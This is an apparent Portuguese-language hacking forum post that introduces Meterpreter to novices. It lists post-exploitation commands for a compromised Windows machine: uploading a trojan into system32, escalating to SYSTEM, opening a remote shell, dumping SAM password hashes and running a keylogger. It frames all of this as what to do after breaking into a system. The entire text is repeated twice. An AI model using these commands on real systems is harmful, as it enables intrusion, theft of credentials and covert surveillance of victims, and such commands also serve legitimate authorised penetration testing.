Tweet
Como eu sempre digo, não adianta jogar ebook na cara dos novatos se eles não sabem nem o significado de algumas palavras. E nós que somos antigos sabemos que eles não conhecem o google rs. então só pra esclarecer pra quem não saiba....
O MeterPreter é um interpretador de comandos do metasploit framework.
Uma vez comprometido o sistema com um exploit você provavelmente irá interagir com o sistema.
É nessa hora que entra em ação o meterpreter.
Traduzindo. Assim que tu invade lá o sistema com o exploit, você vai ter que mandar comandos pro sistema, com isso, interagindo...
Alguns comandos que todos conhecem, mas é so pra esclarecer.
Listar arquivos
meterpreter > ls
Copiar um arquivo
meterpreter > download c:\\boot.ini
Enviar um arquivo
meterpreter > upload evil_trojan.exe c:\\windows\\system32
Visualizar informações de rede
meterpreter > ipconfig
Exibir qual o usuários está executando o Meterpreter
meterpreter > getuid
Logar como system
meterpreter > getsystem
Ganhar privilegios
meterpreter > user priv
Executar um comando na maquina remota
meterpreter > execute -f cmd.exe -i –H
Usar o shell (prompt) remoto
meterpreter > shell
Exibir o tempo de ociosidade do sistema remoto
meterpreter > idletime
Exibir a lista do banco de dados SAM
meterpreter > run post/windows/gather/hashdump
Iniciar um keylogger nativo do meterpreter
meterpreter > keyscan_start
Para o keylogger
meterpreter > keyscan_stop
Analisar o que foi capturado
meterpreter > keyscan_dump
"- Obrigado tio Sheldon, vou agradecer pra tu ficar feliz (:"
O MeterPreter é um interpretador de comandos do metasploit framework.
Uma vez comprometido o sistema com um exploit você provavelmente irá interagir com o sistema.
É nessa hora que entra em ação o meterpreter.
Traduzindo. Assim que tu invade lá o sistema com o exploit, você vai ter que mandar comandos pro sistema, com isso, interagindo...
Alguns comandos que todos conhecem, mas é so pra esclarecer.
Listar arquivos
meterpreter > ls
Copiar um arquivo
meterpreter > download c:\\boot.ini
Enviar um arquivo
meterpreter > upload evil_trojan.exe c:\\windows\\system32
Visualizar informações de rede
meterpreter > ipconfig
Exibir qual o usuários está executando o Meterpreter
meterpreter > getuid
Logar como system
meterpreter > getsystem
Ganhar privilegios
meterpreter > user priv
Executar um comando na maquina remota
meterpreter > execute -f cmd.exe -i –H
Usar o shell (prompt) remoto
meterpreter > shell
Exibir o tempo de ociosidade do sistema remoto
meterpreter > idletime
Exibir a lista do banco de dados SAM
meterpreter > run post/windows/gather/hashdump
Iniciar um keylogger nativo do meterpreter
meterpreter > keyscan_start
Para o keylogger
meterpreter > keyscan_stop
Analisar o que foi capturado
meterpreter > keyscan_dump
"- Obrigado tio Sheldon, vou agradecer pra tu ficar feliz (:"